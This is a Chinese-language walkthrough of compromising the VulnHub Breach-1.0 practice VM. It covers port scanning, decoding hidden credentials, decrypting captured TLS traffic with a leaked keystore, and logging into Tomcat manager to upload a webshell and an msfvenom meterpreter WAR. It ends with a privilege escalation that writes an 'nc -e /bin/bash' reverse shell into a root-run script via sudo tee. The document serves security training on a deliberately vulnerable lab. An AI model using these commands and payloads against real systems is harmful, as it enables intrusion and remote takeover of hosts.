kali滲透綜合靶機(十五)--Breach-1.0靶機
kali滲透綜合靶機(十五)--Breach-1.0靶機php
靶機下載地址:https://download.vulnhub.com/breach/Breach-1.0.ziphtml
1、主機發現java
1.netdiscover -i eth0 -r 192.168.110.0/24python
2、端口掃描mysql
1. masscan --rate=10000 -p0-65535 192.168.110.140,發現端口幾乎所有開放了,不符合常識,可能目標對端口掃描作了一些防禦措施linux
3、漏洞查找與利用web
1.目錄掃描sql
2.1直接訪問80端口,進入web首頁http://192.168.110.140/shell
2.2查看頁面源碼發現一串疑似base64加密的字符串數據庫
2.3將其複製到Burpsuite Decoder進行base64解碼,解密後發現仍是base64編碼,繼續base64解碼,獲得pgibbons:damnitfeel$goodtobeagang$ta
2.4.發現圖中的圖片等點擊,點擊跳轉
3.1查看頁面源碼,發現以下提示
3.2嘗試發現頁面是否有有用的信息,發現點擊下圖,跳轉到impresscms登陸界面
4.嘗試使用以前base64解密出來的疑似用戶名密碼的字符串,成功登陸
5.發現cms大體版本信息,搜索引擎搜索是否有相關的漏洞
6. exploit-db.com查找impress cms漏洞:發現ImpressCMS 1.3.9 SQL注入漏洞, /modules/profile/admin/field.php,訪問該頁面,提示沒有權限訪問,沒法進行注入
7. 發現收件箱Inbox顯示有3封郵件,依次打開看
8. 第三個郵件發現有一個SSL證書被保存在192.168.110.140/.keystore
9. 訪問http://192.168.110.140/.keystore下載包含SSL證書的密鑰庫keystore文件,keystore是存儲公私密鑰的一種文件格式
10. 點擊View Account菜單進入界面,再依次點擊頁面的Content,會彈出一行連接Content SSL implementation test capture,點擊連接
11.點擊完上圖的連接,跳轉到以下界面,能夠看到一個名爲:_SSL_test_phase1.pcap的Wireshark流量包文件,下載
12.用wireshark打開下載的pacp包,發現是包的內容通過SSL加密
13.查看keystore這個密匙庫裏面的全部證書
keytool -list -keystore keystore
14. 從密鑰庫導出.p12證書
keytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcat
15. 將.p12證書導入Wireshark
在Wireshark中打開_SSL_test_phase1.pcap流量包文件,選擇菜單:編輯–首選項–Protocols–SSL,點擊右邊的Edit
16. 導入證書後,https流量已經被解密,查看每一個http流量包
16.1發現以下
16.2訪問https://192.168.110.140:8443/_M@nag3Me/html發現是tomcat管理頁面,須要登陸
16.3發現tomcat採用採用http basic認證,認證數據包以下,wireshark自動解密tomcat:Tt\5D8F(#!*u=G)4m7zB
17.使用上面獲得的tomcat密碼登陸成功
18.把一句話jsp一句話木立刻傳過去,打包成rar,在修改後綴爲war
19.能夠看到上傳成功
20.菜刀連接失敗, 發現的問題:上傳的菜刀馬,一下子就會消失,文件被刪除,須要從新上傳war包纔可以繼續使用菜刀,主機可能有殺軟或者殺web shell工具。解決方法:bash反彈一個shell出來
21.msf生成一個war格式的反彈shell
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.136 lport=4444 -f war -o test.war
22.msf開啓監聽
23.tomcat後臺上傳test.war文件
24.訪問https://192.168.110.140:8443/test/,等幾秒,kali得到反彈shell
25. python -c 'import pty;pty.spawn("/bin/bash")'
26.拿到shell以後,接下來即是提權了,收集主機信息,發現沒有內核提權,在/etc/passwd發現milton 和 blumbergh用戶
27.在網站發現以下內容
28.查看發現以下內容
29.登陸mysql數據庫,發現milton的密碼
30.解密
31.登陸milton,查看是否屬於sudo組,沒有什麼發現
32. 在http://192.168.110.140/images/目錄下發現六張圖片
33.將圖片複製到kali linux,使用strings打印各圖片其中的可打印字符,追加輸出到images.txt,在vim下查看,密碼在bill.png圖片中,密碼爲coffeestains
34.登陸blumbergh,查看是否屬於sudo組
35.查看權限,發現/usr/share/cleanup/tidyup.sh只有root可寫
36.tidyup.sh文件只有root可寫,而可以以root權限運行tee命令,那麼用tee命令寫tidyup.sh:先將反彈shell命令寫入shell.txt文件,nc反彈命令
echo "nc -e /bin/bash 192.168.110.136 5555" > shell.txt
再使用tee命令將shell.txt內容輸出到tidyup.sh
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
也能夠用mknod backpipe p && nc 192.168.110.136 2222 0<backpipe | /bin/bash 1>backpipe反彈shell
查看tidyup.sh文件寫入成功:cat /usr/share/cleanup/tidyup.sh
37.kali監聽,提權成功
- 1. kali滲透綜合靶機(五)--zico2靶機
- 2. kali滲透綜合靶機(十一)--BSides-Vancouver靶機
- 3. kali滲透綜合靶機(十七)--HackInOS靶機
- 4. kali滲透綜合靶機(十二)--SickOs1.2靶機
- 5. kali滲透綜合靶機(十四)--g0rmint靶機
- 6. kali滲透綜合靶機(十八)--FourAndSix2靶機
- 7. kali滲透綜合靶機(十六)--evilscience靶機
- 8. kali滲透綜合靶機(十三)--Dina 1.0靶機
- 9. 22. CTF綜合靶機滲透(十五)
- 10. kali滲透綜合靶機(八)--Billu_b0x靶機
- 更多相關文章...
- • SQL 主機 - SQL 教程
- • 網站主機提供商 - 網站主機教程
- • 漫談MySQL的鎖機制
- • RxJava操作符(五)Error Handling
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. kali滲透綜合靶機(五)--zico2靶機
- 2. kali滲透綜合靶機(十一)--BSides-Vancouver靶機
- 3. kali滲透綜合靶機(十七)--HackInOS靶機
- 4. kali滲透綜合靶機(十二)--SickOs1.2靶機
- 5. kali滲透綜合靶機(十四)--g0rmint靶機
- 6. kali滲透綜合靶機(十八)--FourAndSix2靶機
- 7. kali滲透綜合靶機(十六)--evilscience靶機
- 8. kali滲透綜合靶機(十三)--Dina 1.0靶機
- 9. 22. CTF綜合靶機滲透(十五)
- 10. kali滲透綜合靶機(八)--Billu_b0x靶機